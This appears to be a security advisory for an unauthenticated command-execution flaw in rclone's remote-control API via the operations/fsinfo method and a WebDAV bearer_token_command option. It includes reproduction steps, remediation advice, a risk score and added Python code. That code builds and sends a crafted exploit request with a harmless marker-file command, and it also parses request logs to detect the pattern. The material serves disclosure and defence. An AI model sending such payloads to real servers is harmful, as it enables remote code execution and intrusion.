Rclone WebDAV Unauthenticated Command Execution Vulnerability via RC Endpoint

Vulnerability

A vulnerability in Rclone's remote control (RC) API allows unauthenticated command execution on the host running rclone. The RC method 'operations/fsinfo' is reachable without authentication and takes an attacker-controlled 'fs' parameter describing the backend to inspect. Because rclone instantiates whatever backend that parameter describes, an attacker can supply a WebDAV backend definition whose 'bearer_token_command' option names a command to run; rclone executes that command when it sets up the backend, giving unauthorized command execution on the server.

Impact

Exploiting this issue gives an unauthenticated attacker command execution on the host where rclone is running with a single request, executing with the privileges of the rclone process. Depending on the server environment, that can be escalated to an interactive shell or used to read and modify any files the rclone user can reach.

Reproduction

To reproduce this vulnerability, start an rclone RC server without global HTTP authentication. Send a POST request to the 'operations/fsinfo' method whose payload contains a crafted WebDAV backend definition with 'bearer_token_command' set to a command that creates a marker file on the host. Judge success by the marker appearing on the host, not by the HTTP response: if the marker exists, the command ran and the vulnerability is reproduced.
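The following is an added example written for this entry; it is not rclone's code and not the advisory's own reproduction. It covers two things: building the crafted 'fs' value for the check above and sending it to an RC listener you are authorised to test, and a small parser that flags the same command-valued parameters in captured RC request bodies, so a defender can spot the pattern in proxy logs. It assumes (the page does not say) that the backend definition is passed in the request's 'fs' parameter using rclone's connection-string syntax (`:webdav,url="...",bearer_token_command="...":`), that config keys may be spelled with `-` or `_`, and that a `_command` suffix is a reasonable heuristic for other command-valued keys. The sample traffic is constructed, not captured.

```python
"""Checker for the rclone RC operations/fsinfo bearer_token_command issue.

Added example code; not rclone's own code.  Assumptions: the crafted backend
travels in the `fs` parameter as a connection string, keys may use `-` or `_`,
and `*_command` keys are treated as command-valued.  Sample data is constructed.
"""
import json
import urllib.error
import urllib.request
from typing import Dict, List, Tuple

KNOWN_COMMAND_KEYS = {"bearer_token_command"}  # the key the advisory names


def _split_params(rest: str) -> List[Tuple[str, str]]:
    """Split `k=v,k2="v,2"` into pairs; a doubled quote inside quotes is a literal quote."""
    items, i, n = [], 0, len(rest)
    while i < n:
        eq, comma = rest.find("=", i), rest.find(",", i)
        if eq == -1 or (comma != -1 and comma < eq):      # bare key with no value
            end = n if comma == -1 else comma
            if rest[i:end].strip():
                items.append((rest[i:end].strip(), ""))
            i = end + 1
            continue
        key, i = rest[i:eq].strip(), eq + 1
        if i < n and rest[i] == '"':                        # quoted value
            i, buf = i + 1, []
            while i < n:
                if rest[i] == '"':
                    if i + 1 < n and rest[i + 1] == '"':    # "" -> literal quote
                        buf.append('"')
                        i += 2
                        continue
                    i += 1
                    break
                buf.append(rest[i])
                i += 1
            value = "".join(buf)
            comma = rest.find(",", i)
        else:                                               # unquoted value
            comma = rest.find(",", i)
            value = rest[i:] if comma == -1 else rest[i:comma]
        i = n if comma == -1 else comma + 1
        items.append((key, value))
    return items


def split_connection_string(fs: str) -> Tuple[str, Dict[str, str], str]:
    """Return (remote or :backend name, parameters, path) for an rclone fs string.

    The remote spec ends at the first ':' outside double quotes; a string with no
    such ':' (a plain local path) yields ("", {}, fs) and is treated as harmless.
    """
    on_the_fly = fs.startswith(":")
    body = fs[1:] if on_the_fly else fs
    i, in_quote = 0, False
    while i < len(body):
        if body[i] == '"':
            in_quote = not in_quote
        elif body[i] == ":" and not in_quote:
            break
        i += 1
    if i == len(body):
        return "", {}, fs
    name, _, rest = body[:i].partition(",")
    params = {k.replace("-", "_"): v for k, v in _split_params(rest)}  # assumed key normalisation
    return (":" + name if on_the_fly else name), params, body[i + 1:]


def command_params(fs: str) -> Dict[str, str]:
    """Parameters in `fs` whose value rclone would run as a command."""
    _, params, _ = split_connection_string(fs)
    return {k: v for k, v in params.items()
            if k in KNOWN_COMMAND_KEYS or k.endswith("_command")}


def build_probe_fs(marker: str, url: str = "http://127.0.0.1:9/") -> str:
    """Connection string for the reproduction step: a WebDAV backend whose
    bearer_token_command creates `marker`.  Only the marker on the host proves
    execution; the HTTP reply is not the evidence."""
    return f':webdav,url="{url}",bearer_token_command="touch {marker}":'


def probe(rc_url: str, marker: str, timeout: float = 10.0) -> dict:
    """POST the crafted fs to /operations/fsinfo on a listener you are authorised
    to test; returns the decoded reply or the HTTP error body.  Needs a live rclone."""
    req = urllib.request.Request(
        rc_url.rstrip("/") + "/operations/fsinfo",
        data=json.dumps({"fs": build_probe_fs(marker)}).encode(),
        headers={"Content-Type": "application/json"},
        method="POST",
    )
    try:
        with urllib.request.urlopen(req, timeout=timeout) as resp:
            return json.load(resp)
    except urllib.error.HTTPError as exc:
        return {"http_status": exc.code, "body": exc.read().decode(errors="replace")}


def flag_requests(requests: List[dict]) -> List[dict]:
    """Run the parser over RC request bodies (e.g. a reverse-proxy capture) and
    report fs-type fields carrying a command-valued parameter.  Generalised to
    srcFs/dstFs as well, since other RC methods take the same string form."""
    findings = []
    for req in requests:
        for field in ("fs", "srcFs", "dstFs"):
            value = req.get("body", {}).get(field)
            if isinstance(value, str) and command_params(value):
                findings.append({"path": req["path"], "field": field,
                                 "params": command_params(value)})
    return findings


SAMPLE_RC_REQUESTS = [  # constructed sample traffic, not captured logs
    {"path": "/operations/fsinfo", "body": {"fs": "backups:archive/2024"}},
    {"path": "/operations/fsinfo",
     "body": {"fs": ':webdav,url="http://127.0.0.1:9/",bearer_token_command="touch /tmp/rc-marker":'}},
    {"path": "/sync/copy",
     "body": {"srcFs": ':webdav,url="http://127.0.0.1:9/",bearer-token-command="id":',
              "dstFs": "/srv/data"}},
]

if __name__ == "__main__":
    for hit in flag_requests(SAMPLE_RC_REQUESTS):
        print(hit)
    # probe("http://127.0.0.1:5572", "/tmp/rc-marker")  # against a test instance only
```

Run it as-is to see the two constructed findings; to actually test an instance, uncomment the probe call, point it at an RC listener you own, and then look for the marker file on that host. The parser deliberately tolerates quoted values containing ':' and ',' so that a URL in the definition does not break the split.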

Remediation

Update to rclone version 1.73.5 or later, where this vulnerability has been patched. Until the upgrade is done, do not expose the RC server without authentication: set --rc-user and --rc-pass (or --rc-htpasswd), do not run with --rc-no-auth, and keep --rc-addr bound to localhost (the default) or otherwise restrict network access to the listener.

Added: Apr 23, 2026, 12:25 AM
Updated: Apr 23, 2026, 12:25 AM

Vulnerability Rating

Custom Algorithm

spread          5.4
impact         10.0
exploitability  6.0
remediation     7.7
relevance       6.5
threat          6.5
urgency         2.9
incentive       0.0

Our algorithm analyzes dozens of metrics to generate these 8 key vulnerability categories, which are then combined to calculate the overall risk score.